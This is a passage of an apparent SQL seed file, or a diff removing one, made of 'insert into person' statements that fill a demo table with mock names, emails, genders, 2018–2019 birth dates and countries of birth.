country_of_birth) values ('Thibaud', 'Scherer', 'tscherer32@goo.gl', 'Male', '10/10/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jacki', 'Sweeney', 'jsweeney33@amazon.co.jp', 'Female', '10/2/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jerad', 'Ragot', 'jragot34@netlog.com', 'Male', '12/5/2018', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mary', 'Sailer', null, 'Female', '8/31/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Curtice', 'Ragsdall', 'cragsdall36@umn.edu', 'Male', '7/7/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kennie', 'Chalfont', 'kchalfont37@taobao.com', 'Male', '11/28/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hubey', 'Alsobrook', 'halsobrook38@craigslist.org', 'Male', '2/18/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Silvain', 'Zanneli', 'szanneli39@epa.gov', 'Male', '2/14/2019', 'Azerbaijan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Karoly', 'Farington', null, 'Male', '1/17/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Barnett', 'McGee', 'bmcgee3b@lulu.com', 'Male', '9/24/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fannie', 'Philpott', 'fphilpott3c@umn.edu', 'Female', '8/1/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ara', 'Clench', 'aclench3d@apple.com', 'Male', '4/3/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ettie', 'Beasley', 'ebeasley3e@dagondesign.com', 'Female', '3/25/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rowland', 'Postill', 'rpostill3f@arstechnica.com', 'Male', '7/21/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Janet', 'Rollo', null, 'Female', '12/19/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Laina', 'Klimkiewich', 'lklimkiewich3h@tuttocitta.it', 'Female', '8/25/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Garvy', 'Sullivan', 'gsullivan3i@themeforest.net', 'Male', '3/4/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bing', 'Lubman', 'blubman3j@independent.co.uk', 'Male', '12/13/2018', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ewart', 'Dewsbury', null, 'Male', '10/10/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rani', 'Pighills', 'rpighills3l@bloomberg.com', 'Female', '8/30/2019', 'Colombia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Claudianus', 'Kohler', 'ckohler3m@senate.gov', 'Male', '7/1/2019', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Charyl', 'Inchcomb', null, 'Female', '5/20/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Towney', 'Barbier', 'tbarbier3o@ifeng.com', 'Male', '5/17/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Giuditta', 'Michallat', 'gmichallat3p@yandex.ru', 'Female', '6/27/2019', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Oneida', 'Kilgannon', null, 'Female', '11/9/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ertha', 'Houlson', 'ehoulson3r@i2i.jp', 'Female', '8/1/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Austin', 'Bendel', 'abendel3s@phpbb.com', 'Male', '9/2/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Price', 'Levesque', 'plevesque3t@i2i.jp', 'Male', '6/6/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kass', 'Bodycote', null, 'Female', '3/8/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Grove', 'Makinson', 'gmakinson3v@alibaba.com', 'Male', '7/20/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shelbi', 'Smieton', 'ssmieton3w@nifty.com', 'Female', '9/17/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Edouard', 'Ruston', 'eruston3x@bing.com', 'Male', '1/5/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rhett', 'Rulf', 'rrulf3y@issuu.com', 'Male', '8/8/2019', 'Israel'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bil', 'Bostock', 'bbostock3z@imageshack.us', 'Male', '11/27/2019', 'Mongolia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tara', 'Penrith', 'tpenrith40@ifeng.com', 'Female', '3/3/2019', 'Vietnam'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fee', 'Pellamont', 'fpellamont41@census.gov', 'Male', '7/28/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ervin', 'Stanbro', 'estanbro42@tinypic.com', 'Male', '11/4/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Diannne', 'Bollands', null, 'Female', '8/29/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Amaleta', 'Kinny', 'akinny44@biglobe.ne.jp', 'Female', '8/16/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sharon', 'Carss', 'scarss45@auda.org.au', 'Female', '4/30/2019', 'Estonia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Durward', 'Petr', 'dpetr46@jiathis.com', 'Male', '4/10/2019', 'Kazakhstan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bar', 'Siggins', 'bsiggins47@blog.com', 'Male', '7/7/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Barbey', 'Reburn', null, 'Female', '6/24/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ira', 'Carus', 'icarus49@unc.edu', 'Male', '7/6/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mozes', 'Veque', null, 'Male', '11/7/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sean', 'Pawsey', 'spawsey4b@linkedin.com', 'Female', '9/22/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jewelle', 'Waples', 'jwaples4c@cafepress.com', 'Female', '9/26/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Loretta', 'Samson', 'lsamson4d@salon.com', 'Female', '2/2/2019', 'Botswana'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wenonah', 'Demschke', 'wdemschke4e@xrea.com', 'Female', '5/2/2019', 'South Africa'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lia', 'Puttnam', null, 'Female', '11/16/2019', 'Luxembourg'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Goldina', 'Haistwell', 'ghaistwell4g@mayoclinic.com', 'Female', '9/30/2019', 'Marshall Islands'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nikolas', 'Henner', null, 'Male', '8/27/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hogan', 'Ishaki', 'hishaki4i@google.co.uk', 'Male', '3/20/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dani', 'Leroy', 'dleroy4j@bloomberg.com', 'Male', '12/6/2018', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marcel', 'Guyan', 'mguyan4k@nature.com', 'Male', '10/27/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mirella', 'Addis', 'maddis4l@macromedia.com', 'Female', '7/29/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gunner', 'Dominico', 'gdominico4m@fda.gov', 'Male', '9/21/2019', 'Ecuador'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ansel', 'Poile', null, 'Male', '10/16/2019', 'Libya'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Etty', 'Cutchey', 'ecutchey4o@umich.edu', 'Female', '6/8/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jacky', 'Stango', 'jstango4p@eventbrite.com', 'Male', '7/18/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cindee', 'Reburn', null, 'Female', '1/7/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Antoine', 'Harnetty', 'aharnetty4r@paypal.com', 'Male', '4/25/2019', 'Sierra Leone'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Delmor', 'Bakeup', null, 'Male', '11/4/2019', 'Colombia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gerhard', 'Winsbury', 'gwinsbury4t@de.vu', 'Male', '12/7/2018', 'Netherlands'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Osborne', 'Kilgour', null, 'Male', '3/15/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wiatt', 'Langridge', 'wlangridge4v@zimbio.com', 'Male', '9/30/2019', 'Guatemala'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Guthrie', 'Randales', 'grandales4w@time.com', 'Male', '1/23/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jermayne', 'Hastwell', 'jhastwell4x@loc.gov', 'Male', '8/25/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ginni', 'Pattingson', 'gpattingson4y@vinaora.com', 'Female', '12/20/2018', 'Pakistan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Raynell', 'Meriguet', null, 'Female', '5/6/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alyda', 'Skahill', 'askahill50@rambler.ru', 'Female', '1/14/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jereme', 'De Robertis', null, 'Male', '7/1/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shannan', 'Kenninghan', null, 'Male', '6/20/2019', 'Burkina Faso'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Von', 'Gerkens', 'vgerkens53@twitpic.com', 'Male', '4/30/2019', 'Tanzania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bruno', 'Onthank', 'bonthank54@amazon.co.jp', 'Male', '9/11/2019', 'Armenia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ulrikaumeko', 'Bellord', 'ubellord55@mac.com', 'Female', '11/25/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sherm', 'Glauber', 'sglauber56@posterous.com', 'Male', '7/24/2019', 'Finland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tatum', 'Guess', 'tguess57@va.gov', 'Female', '7/15/2019', 'Malawi'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ruddy', 'Fortye', 'rfortye58@goo.gl', 'Male', '7/6/2019', 'Sudan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jerrine', 'MacPake', null, 'Female', '10/19/2019', 'Sudan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Travers', 'Epinoy', null, 'Male', '10/20/2019', 'Morocco'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Karena', 'Cowie', 'kcowie5b@foxnews.com', 'Female', '7/25/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Anallise', 'Spreag', null, 'Female', '11/18/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nicolea', 'Copestake', 'ncopestake5d@jigsy.com', 'Female', '2/23/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Elisha', 'Smellie', 'esmellie5e@seesaa.net', 'Male', '11/26/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Peder', 'O''Kinneally', 'pokinneally5f@angelfire.com', 'Male', '7/20/2019', 'Costa Rica'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Eloisa', 'Van Leeuwen', null, 'Female', '6/21/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vasili', 'Willmer', 'vwillmer5h@imageshack.us', 'Male', '4/7/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kissee', 'Moreby', 'kmoreby5i@1und1.de', 'Female', '9/13/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fiorenze', 'Liepina', null, 'Female', '3/4/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Waly', 'Crimpe', null, 'Female', '7/17/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Piggy', 'Moody', 'pmoody5l@bing.com', 'Male', '4/20/2019', 'Finland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Umberto', 'Maxwale', 'umaxwale5m@accuweather.com', 'Male', '6/21/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vassili', 'MacGow', 'vmacgow5n@yellowpages.com', 'Male', '2/7/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Johan', 'Selvester', null, 'Male', '10/25/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Curcio', 'Whorf', 'cwhorf5p@phoca.cz', 'Male', '7/22/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shaylah', 'Richly', 'srichly5q@amazonaws.com', 'Female', '1/8/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Merrel', 'Roft', 'mroft5r@disqus.com', 'Male', '2/17/2019', 'Italy'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Raphael', 'Kasparski', 'rkasparski5s@delicious.com', 'Male', '10/24/2019', 'Nigeria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bibbye', 'Kubalek', null, 'Female', '12/8/2018', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ilario', 'O''Clery', null, 'Male', '10/6/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ann-marie', 'Fitzhenry', 'afitzhenry5v@oaic.gov.au', 'Female', '11/20/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Zarla', 'Hudd', null, 'Female', '7/27/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Luciana', 'Talloe', null, 'Female', '9/30/2019', 'Belarus'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Al', 'Biaggetti', 'abiaggetti5y@is.gd', 'Male', '11/11/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rakel', 'Crump', 'rcrump5z@devhub.com', 'Female', '11/11/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kenneth', 'Billington', 'kbillington60@bloglines.com', 'Male', '8/25/2019', 'Serbia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marjory', 'Chesser', 'mchesser61@auda.org.au', 'Female', '2/27/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Flss', 'Folliss', null, 'Female', '5/28/2019', 'Swaziland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Giuseppe', 'Brian', 'gbrian63@weibo.com', 'Male', '8/19/2019', 'Uganda'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sadella', 'Ethelston', 'sethelston64@de.vu', 'Female', '11/15/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ashely', 'Skerritt', null, 'Female', '8/16/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pat', 'Minchell', 'pminchell66@census.gov', 'Male', '12/8/2018', 'Finland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bartie', 'Zarfat', null, 'Male', '9/17/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Benedikt', 'Gregs', 'bgregs68@nature.com', 'Male', '5/13/2019', 'Finland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Corrine', 'Greenwell', 'cgreenwell69@ca.gov', 'Female', '12/2/2018', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cordelia', 'Davidovics', 'cdavidovics6a@ebay.co.uk', 'Female', '7/13/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shay', 'Tinner', null, 'Male', '6/17/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gualterio', 'Furby', 'gfurby6c@google.ru', 'Male', '6/24/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sybilla', 'Oxenbury', null, 'Female', '4/6/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wayne', 'Sawers', null, 'Male', '7/18/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Borg', 'Trafford', 'btrafford6f@sina.com.cn', 'Male', '11/13/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Osbourn', 'Barbe', null, 'Male', '1/22/2019', 'Albania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cobbie', 'Jojic', 'cjojic6h@lycos.com', 'Male', '8/9/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lurleen', 'Enoksson', 'lenoksson6i@histats.com', 'Female', '11/13/2019', 'Morocco'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Angelia', 'Arkow', 'aarkow6j@jugem.jp', 'Female', '4/14/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jobi', 'Sterry', 'jsterry6k@npr.org', 'Female', '12/13/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Eolande', 'Devon', null, 'Female', '1/15/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Creight', 'Pheazey', null, 'Male', '12/18/2018', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nelie', 'Chestney', 'nchestney6n@live.com', 'Female', '1/20/2019', 'New Zealand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Padriac', 'Brunnstein', 'pbrunnstein6o@hostgator.com', 'Male', '7/23/2019', 'Morocco'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Geralda', 'Silliman', null, 'Female', '7/21/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Teriann', 'Hastin', 'thastin6q@alibaba.com', 'Female', '9/20/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Madel', 'Janik', 'mjanik6r@redcross.org', 'Female', '6/15/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lindon', 'Bes', null, 'Male', '8/11/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Zara', 'Mettrick', 'zmettrick6t@dmoz.org', 'Female', '9/27/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gui', 'Lochhead', 'glochhead6u@xinhuanet.com', 'Female', '2/20/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Constance', 'Strewther', 'cstrewther6v@nasa.gov', 'Female', '11/7/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Berky', 'Bollon', 'bbollon6w@sitemeter.com', 'Male', '10/23/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fidelio', 'Burnham', 'fburnham6x@digg.com', 'Male', '12/9/2018', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bar', 'Antusch', null, 'Male', '7/28/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Meaghan', 'Jerdan', 'mjerdan6z@barnesandnoble.com', 'Female', '8/14/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Foster', 'Belcher', 'fbelcher70@nature.com', 'Male', '11/18/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sofia', 'Newdick', null, 'Female', '7/12/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lenard', 'Venning', null, 'Male', '8/20/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nevile', 'Dickson', 'ndickson73@elpais.com', 'Male', '5/14/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Glynn', 'Sumpner', 'gsumpner74@wikimedia.org', 'Male', '1/21/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rochell', 'Padley', 'rpadley75@si.edu', 'Female', '9/2/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jenine', 'Normanville', null, 'Female', '6/15/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Giulietta', 'Rawsthorne', 'grawsthorne77@alexa.com', 'Female', '7/12/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Greggory', 'Dobbie', 'gdobbie78@washington.edu', 'Male', '5/26/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Enos', 'McAlister', null, 'Male', '5/12/2019', 'Japan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sauveur', 'Brozsset', null, 'Male', '8/10/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cornelle', 'Abrahm', 'cabrahm7b@pagesperso-orange.fr', 'Female', '6/9/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shae', 'Ceeley', null, 'Female', '2/10/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Chalmers', 'Nijs', null, 'Male', '1/31/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Maryl', 'Bernasek', 'mbernasek7e@scientificamerican.com', 'Female', '10/28/2019', 'New Zealand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Consolata', 'Tebald', null, 'Female', '7/16/2019', 'Ghana'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dominick', 'Brooks', 'dbrooks7g@tuttocitta.it', 'Male', '5/15/2019', 'Vietnam'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cristabel', 'Curnok', 'ccurnok7h@chron.com', 'Female', '11/8/2019', 'Ivory Coast'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jeffrey', 'Matusevich', 'jmatusevich7i@soundcloud.com', 'Male', '3/25/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Betta', 'Culleford', 'bculleford7j@dyndns.org', 'Female', '9/14/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Franni', 'Petters', 'fpetters7k@google.cn', 'Female', '5/26/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kerr', 'Joffe', 'kjoffe7l@studiopress.com', 'Male', '10/31/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wyn', 'O''Farris', null, 'Male', '6/5/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Caz', 'Tremellier', 'ctremellier7n@naver.com', 'Male', '6/16/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Salvador', 'Simants', 'ssimants7o@biglobe.ne.jp', 'Male', '5/14/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alfy', 'Charity', 'acharity7p@theguardian.com', 'Male', '3/13/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gabriell', 'Toffaloni', 'gtoffaloni7q@si.edu', 'Female', '9/2/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jelene', 'Pearn', 'jpearn7r@nytimes.com', 'Female', '4/26/2019', 'Madagascar'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Matty', 'Doding', null, 'Male', '10/7/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Binky', 'Rivenzon', 'brivenzon7t@google.es', 'Male', '10/7/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Clayborn', 'Hinckesman', 'chinckesman7u@wp.com', 'Male', '6/7/2019', 'New Zealand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Raffaello', 'Hurtic', 'rhurtic7v@army.mil', 'Male', '5/15/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rosella', 'Gludor', null, 'Female', '7/22/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Karyl', 'Mochar', null, 'Female', '5/10/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shelagh', 'Lainton', 'slainton7y@mac.com', 'Female', '3/9/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tim', 'Ollander', 'tollander7z@state.tx.us', 'Male', '11/12/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rossie', 'Keeling', 'rkeeling80@lulu.com', 'Male', '11/3/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Franky', 'Romao', 'fromao81@jalbum.net', 'Female', '7/15/2019', 'Serbia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vincents', 'Blaney', 'vblaney82@hatena.ne.jp', 'Male', '10/11/2019', 'South Korea'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jacquenetta', 'Jeyness', null, 'Female', '7/17/2019', 'Kosovo'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Morley', 'Older', 'molder84@chicagotribune.com', 'Male', '7/22/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Emmit', 'Forber', 'eforber85@unesco.org', 'Male', '11/24/2019', 'Sierra Leone'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Boycey', 'Vigietti', 'bvigietti86@ameblo.jp', 'Male', '4/29/2019', 'Cameroon'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Catlin', 'Simnor', 'csimnor87@timesonline.co.uk', 'Female', '12/1/2018', 'South Africa'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ilysa', 'Revill', 